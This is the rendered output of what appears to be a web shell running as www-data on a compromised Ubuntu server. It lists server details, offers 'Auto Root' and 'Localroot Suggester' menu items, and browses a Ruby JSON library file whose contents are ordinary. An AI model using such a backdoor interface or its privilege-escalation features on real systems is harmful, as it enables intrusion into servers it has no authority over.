Linux tsuru-no-tsurugi 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.0.18 & Your IP : 216.73.217.105
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
ruby /
3.0.0 /
json /
Delete
Unzip
Name
Size
Permission
Date
Action
add
[ DIR ]
drwxr-xr-x
2026-07-06 06:50
common.rb
20.85
KB
-rw-r--r--
2026-06-17 20:57
ext.rb
391
B
-rw-r--r--
2026-06-17 20:57
generic_object.rb
1.39
KB
-rw-r--r--
2026-06-17 20:57
version.rb
302
B
-rw-r--r--
2026-06-17 20:57
Save
Rename
require 'json/common' module JSON # This module holds all the modules/classes that implement JSON's # functionality as C extensions. module Ext require 'json/ext/parser' require 'json/ext/generator' $DEBUG and warn "Using Ext extension for JSON." JSON.parser = Parser JSON.generator = Generator end JSON_LOADED = true unless defined?(::JSON::JSON_LOADED) end